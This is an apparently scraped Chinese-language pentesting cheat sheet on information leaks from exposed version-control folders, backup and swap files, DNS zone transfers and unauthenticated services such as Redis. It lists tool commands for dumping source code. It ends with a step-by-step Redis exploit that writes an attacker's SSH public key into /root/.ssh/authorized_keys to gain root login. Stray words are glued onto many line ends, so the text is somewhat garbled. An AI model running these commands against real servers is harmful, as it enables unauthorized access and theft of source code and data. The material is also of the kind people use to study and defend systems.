web源碼泄漏php
.hg源碼泄漏:html
漏洞成因:hg init的時候會生成.hg,http://www.xx.com/.hg/,python
工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)git
.git源碼泄漏:web
漏洞成因:在運行git init初始化代碼庫的時候,會在當前目錄下產生一個.git的隱藏文件,用來記錄代碼的變動記錄等,沒有刪除這個文件,致使泄漏,http://www.xxx.com/.git/configredis
工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)vim
.DS_Store源碼泄漏:緩存
漏洞成因:在發佈代碼時,沒有刪除文件夾中隱藏的.DS_store,被發現後,獲取了敏感的文件名等信息,http://www.xxx.com/.ds_store安全
工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)服務器
網站備份壓縮文件:
在網站的使用過程當中,每每須要對網站中的文件進行修改,升級,此時就須要對網站整或其中某一頁面進行備份,當備份文件或修改過程當中的緩存文件由於各類緣由被留在網站web目錄下,而該目錄又沒有設置訪問權限,就有可能致使備份文件被下載,致使信息泄漏,給服務器安全埋下隱患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,
工具:能夠使用一些掃描軟件,進行掃描,如awvs之類的
像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 能夠直接用vim -r inde.php來讀取文件
SVN致使文件泄漏:
版本控制系統
工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)
應用層泄漏
DNS域傳送:
dns服務器的主備數據同步,使用的是域傳送功能,若是使用默認配置文件進行配置,就會存在dns域傳送漏洞(不手動添加allow-transfer)
工具:dig @1.1.1.1 xxx.com axfr (會泄漏一些信息)
HeartBleed:
利用https
從堆棧錯誤泄漏到RCE:
利用報錯,泄漏信息,利用函數try{....}catche(e){e.printstack;}
未受權訪問漏洞:
未受權訪問----應用層服務的問題,服務啓動後,沒配置任何憑證,致使能夠直接進入
弱口令---配置的密碼過於簡單常見
空口令---沒配置密碼
目前主要存在未受權訪問漏洞的以下:
NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,
ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,這些都是挖礦勒索的高發地帶
如:
redis爲受權訪問漏洞,默認狀況下會綁定在0.0.0.0:6379,這樣會將redis服務暴露到公網上,若是沒有開啓認證的狀況下,能夠致使任意用戶能夠訪問目標服務器,能夠利用相關方法,在redis服務器上寫入公鑰,進而能夠使用對應私鑰直接登錄目標服務器。
1.本地生成公鑰私鑰
ssh-keygen -t rsa
2.把公鑰寫入xx.txt文件
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > xx.txt
3.鏈接redis寫入文件
cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit
redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /root/.ssh/
192.168.1.2:6379> config get dir
1)"dir"
2)"/root/.ssh"
192.168.1.2:6379> config set dbfilename "authorized_keys"
192.168.1.2"6379> save
也能夠使用msf裏面成熟的exp來利用
友情連接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn